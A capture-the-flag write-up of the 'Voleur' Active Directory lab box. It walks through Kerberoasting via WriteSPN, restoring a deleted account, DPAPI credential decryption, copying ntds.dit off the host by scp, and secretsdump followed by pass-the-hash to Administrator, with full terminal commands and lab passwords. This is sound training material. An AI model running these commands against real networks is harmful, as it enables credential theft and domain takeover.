VOLEUR is a Windows AD DC box chaining WriteSPN Kerberoasting, AD object restoration, DPAPI credential decryption, and offline ntds.dit dumping to achieve full domain compromise.
Difficulty: Hard
OS: Windows (Active Directory / Domain Controller)
IP:10.129.232.130
Summary
VOLEUR is a Windows Active Directory Domain Controller machine. The attack chain involves exploiting Kerberos Pre-Authentication being disabled for an initial user, enumerating SMB shares to recover a password-protected Excel file containing credentials and AD access notes, then chaining a series of AD privilege abuse techniques: WriteSPN → Kerberoasting → GenericWrite → AD Object Restore → DPAPI credential decryption → SSH access to a backup account with ntds.dit on disk, ultimately yielding a full domain compromise via impacket-secretsdump.
Enumeration
Nmap
The scan reveals a Domain Controller for voleur.htb. Notably, there is an SSH service on port 2222 running on a Linux kernel — suggesting a Linux subsystem or container co-hosted on the DC. The clock skew of nearly 8 hours also indicates the attacker's clock needs syncing for Kerberos to work.
Clock Sync
Kerberos is time-sensitive (±5 minutes tolerance), so the first step is syncing the local clock:
With credentials ryan.naylor:HollowOct31Nyt (presumably obtained from a prior step or initial hint), and noting from the Access Review spreadsheet later that Ryan has Kerberos Pre-Authentication disabled, authentication is performed using Kerberos rather than NTLM.
A Kerberos config file is generated and installed:
SMB Share Enumeration
The IT share is the most interesting. Connecting via smbclient:
A file Access_Review.xlsx is retrieved from the share.
Access_Review.xlsx — Credential Intelligence
The Excel file is password-protected. The password hash is extracted with office2john and cracked with john:
The spreadsheet reveals a wealth of information about domain users and service accounts:
User Accounts
User
Job Title
Permissions
Notes
Ryan.Naylor
First-Line Support Technician
SMB
Kerberos Pre-Auth disabled temporarily to test legacy systems
Marie.Bryant
First-Line Support Technician
SMB
Lacey.Miller
Second-Line Support Technician
Remote Management Users
Todd.Wolfe
Second-Line Support Technician
Remote Management Users
Leaver. Password reset to NightT1meP1dg3on14 and account deleted
Jeremy.Combs
Third-Line Support Technician
Remote Management Users
Administrator
Administrator
Domain Admin
Not to be used for daily tasks!
Service Accounts
Account
Permissions
Notes
svc_backup
Windows Backup
Speak to Jeremy!
svc_ldap
LDAP Services
P/W: M1XyC9pW7qT5Vn
svc_iis
IIS Administration
P/W: N5pXyW1VqM?CZ8
svc_winrm
Remote Management
Need to ask Lacey as she reset this recently
This single file gives us plaintext passwords for svc_ldap and svc_iis, a deleted account with its reset password (todd.wolfe), and critical context about the AD environment.
the Access-Review.xlsx had these entries in it
AD Enumeration — svc_ldap
With svc_ldap:M1XyC9pW7qT5Vn, LDAP can be queried directly. An ldapsearch confirms that svc_ldap is a member of the Restore_Users group:
svc_ldap is part of Restore_Users group
BloodHound Graph
Running BloodHound reveals two critical edges
Two attack paths are immediately clear:
WriteSPN on svc_winrm → Set a fake SPN → Kerberoast the hash → Crack the password
GenericWrite on lacey.miller → Set a fake SPN → Kerberoast her hash
Lateral Movement 1 — Kerberoasting svc_winrm via WriteSPN
Since svc_ldap has WriteSPN rights over svc_winrm, a fake SPN can be written to make svc_winrm Kerberoastable:
couldnt crack lacey.miller hash, wouldn't matter anyways, i think
Lateral Movement 2 — Restoring the Deleted todd.wolfe Account
The Access_Review spreadsheet noted that todd.wolfe was a leaver whose password was reset to NightT1meP1dg3on14 before the account was deleted. The Restore_Users group membership on svc_ldap implies the ability to restore deleted AD objects.
Locating the Deleted Object
The deleted object GUID is returned:
Restoring via RunasCs
RunasCs.exe is uploaded to the Evil-WinRM session as svc_winrm and used to run Restore-ADObject in the context of svc_ldap, which has the required group membership:
After a short delay (the account needs time to propagate back into the directory), todd.wolfe can authenticate:
todd.wolfe has READ access to the IT share. Under the archived user profile path, his DPAPI master key and a credential blob are found:
Both files are downloaded via smbclient.
Step 1 — Decrypt the DPAPI Master Key
Step 2 — Decrypt the Credential Blob
Credentials:jeremy.combs:qT3V9pLXyN7W4m
The Access_Review spreadsheet noted Jeremy has a connection to svc_backup ("Speak to Jeremy!")
Lateral Movement 3 — jeremy.combs → svc_backup → ntds.dit
Shell as jeremy.combs
now we've got the password of jeremy.combs and in excel file we saw that he has connection with svc_backup so we will access his account using an Evil-WinRM shell
SSH Key for svc_backup
Inside C:\IT\Third-Line Support\, an id_rsa private key is found alongside a Note.txt. This key grants SSH access to svc_backup on port 2222 (the Linux subsystem):
Locating ntds.dit
The svc_backup account (Windows Backup Operators) has access to a pre-staged backup directory:
All three files are exfiltrated via scp:
then we'll get these files and use impacket-secretsdump to get the hashes
Privilege Escalation — Domain Admin via secretsdump
With ntds.dit, SYSTEM, and SECURITY hive files in hand, all domain hashes are extracted offline:
The Administrator NTLM hash is recovered. A TGT is obtained via Pass-the-Hash:
Attack Chain Summary
Key Techniques
Kerberos-only auth (NTLM disabled on target) — all lateral movement uses -k Kerberos flags
WriteSPN abuse — assigning a fake SPN to a user account to make it Kerberoastable
AD Object Restore — using Restore-ADObject via RunasCs under a group-privileged context
DPAPI offline decryption — master key derived from user password + SID, applied to a credential blob to recover plaintext secrets
Offline ntds.dit dumping — extracting the AD database from a backup rather than running LSASS tools in memory
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ nmap 10.129.232.130 -sCV
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 03:39 -0400
Nmap scan report for 10.129.232.130
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-11 15:39:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2026-03-11T15:39:50
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 7h59m55s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.59 seconds
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ sudo ntpdate voleur.htb
2026-03-11 11:46:20.923909 (-0400) +28797.386158 +/- 0.079981 voleur.htb 10.129.232.130 s1 no-leap
CLOCK: time stepped by 28797.386158
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ nxc smb 10.129.232.130 -u ryan.naylor -p 'HollowOct31Nyt' --shares -k --generate-krb5-file voleur.krb5
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [+] krb5 conf saved to: voleur.krb5
SMB 10.129.232.130 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=voleur.krb5
SMB 10.129.232.130 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
[11:50:20] ERROR NetBIOSTimeout on target 10.129.232.130: The NETBIOS connection with the remote host timed out. connection.py:185
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ echo '[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = VOLEUR.HTB
[realms]
VOLEUR.HTB = {
kdc = dc.voleur.htb
admin_server = dc.voleur.htb
default_domain = voleur.htb
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB ' | sudo tee /etc/krb5.conf
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ nxc smb 10.129.232.130 -u ryan.naylor -p 'HollowOct31Nyt' --shares -k
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB 10.129.232.130 445 DC [*] Enumerated shares
SMB 10.129.232.130 445 DC Share Permissions Remark
SMB 10.129.232.130 445 DC ----- ----------- ------
SMB 10.129.232.130 445 DC ADMIN$ Remote Admin
SMB 10.129.232.130 445 DC C$ Default share
SMB 10.129.232.130 445 DC Finance
SMB 10.129.232.130 445 DC HR
SMB 10.129.232.130 445 DC IPC$ READ Remote IPC
SMB 10.129.232.130 445 DC IT READ
SMB 10.129.232.130 445 DC NETLOGON READ Logon server share
SMB 10.129.232.130 445 DC SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ office2john Access_Review.xlsx > hash.txt
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1 (Access_Review.xlsx)
1g 0:00:00:01 DONE (2026-03-11 12:03) 0.5102g/s 408.1p/s 408.1c/s 408.1C/s football1..martha
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> ./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell -c Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'"
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
No output received from the process.
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ impacket-getTGT voleur.htb/todd.wolfe -dc-ip 10.129.232.130
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in todd.wolfe.ccache
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ export KRB5CCNAME=todd.wolfe.ccache
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ nxc smb dc.voleur.htb -u todd.wolfe -p NightT1meP1dg3on14 -d VOLEUR.htb -k --shares
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB dc.voleur.htb 445 dc [-] VOLEUR.htb\todd.wolfe:NightT1meP1dg3on14 KDC_ERR_C_PRINCIPAL_UNKNOWN
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ nxc smb dc.voleur.htb -u todd.wolfe -p NightT1meP1dg3on14 -d VOLEUR.htb -k --shares
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] VOLEUR.htb\todd.wolfe:NightT1meP1dg3on14
SMB dc.voleur.htb 445 dc [*] Enumerated shares
SMB dc.voleur.htb 445 dc Share Permissions Remark
SMB dc.voleur.htb 445 dc ----- ----------- ------
SMB dc.voleur.htb 445 dc ADMIN$ Remote Admin
SMB dc.voleur.htb 445 dc C$ Default share
SMB dc.voleur.htb 445 dc Finance
SMB dc.voleur.htb 445 dc HR
SMB dc.voleur.htb 445 dc IPC$ READ Remote IPC
SMB dc.voleur.htb 445 dc IT READ
SMB dc.voleur.htb 445 dc NETLOGON READ Logon server share
SMB dc.voleur.htb 445 dc SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ kinit [email protected]Password for [email protected]:
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ smbclient //dc.voleur.htb/IT -k -no-pass
WARNING: The option -k|--kerberos is deprecated!
Try "help" to get a list of possible commands.
smb: \>
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\> ls
. DS 0 Wed Jan 29 10:13:09 2025
.. DS 0 Wed Jan 29 10:13:09 2025
08949382-134f-4c63-b93c-ce52efc0aa88 A 740 Wed Jan 29 07:53:09 2025
BK-VOLEUR AHS 900 Wed Jan 29 07:53:09 2025
Preferred AHS 24 Wed Jan 29 07:53:09 2025
5311743 blocks of size 4096. 994875 blocks available
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\> get 08949382-134f-4c63-b93c-ce52efc0aa88
getting file \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88 of size 740 as 08949382-134f-4c63-b93c-ce52efc0aa88 (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
...SNIP
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\> ls
. DS 0 Wed Jan 29 10:13:09 2025
.. D 0 Wed Jan 29 10:13:09 2025
Credentials DSn 0 Wed Jan 29 10:13:09 2025
Crypto DS 0 Wed Jan 29 10:13:09 2025
Internet Explorer D 0 Wed Jan 29 10:13:09 2025
Network D 0 Wed Jan 29 10:13:09 2025
Protect DS 0 Wed Jan 29 10:13:09 2025
Spelling D 0 Sat May 8 04:20:24 2021
SystemCertificates DSn 0 Wed Jan 29 10:13:09 2025
Vault D 0 Wed Jan 29 07:54:04 2025
Windows D 0 Wed Jan 29 10:13:10 2025
5311743 blocks of size 4096. 994411 blocks available
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\> cd Credentials
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\> ls
. DSn 0 Wed Jan 29 10:13:09 2025
.. DS 0 Wed Jan 29 10:13:09 2025
772275FAD58525253490A9B0039791D3 An 398 Wed Jan 29 07:55:19 2025
5311743 blocks of size 4096. 994411 blocks available
/mnt/c/IT/Third-Line Support/Backups/
├── Active Directory/
│ ├── ntds.dit
│ └── ntds.jfm
└── registry/
├── SECURITY
└── SYSTEM
┌──(kali㉿kali)-[~/Documents/voleur/last_phase]
└─$ scp -i ../dpapi_phase/id_rsa -P 2222 "[email protected]:/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY" ./SECURITY
scp -i ../dpapi_phase/id_rsa -P 2222 "[email protected]:/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM" ./SYSTEM
scp -i ../dpapi_phase/id_rsa -P 2222 "[email protected]:/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit" ./ntds.dit
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
SECURITY 100% 32KB 44.2KB/s 00:00
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
SYSTEM 100% 18MB 604.0KB/s 00:29
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
ntds.dit 100% 24MB 532.5KB/s 00:46
┌──(kali㉿kali)-[~/Documents/voleur/last_phase]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
┌──(kali㉿kali)-[~]
└─$ impacket-getTGT voleur.htb/administrator -hashes :e656e07xxxxxxxxxxxxx60b259ad2 -dc-ip 10.129.232.130
export KRB5CCNAME=administrator.ccache
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
6070xxxxxxxxxxxxxxxxxxxxxxxxxxx5c13
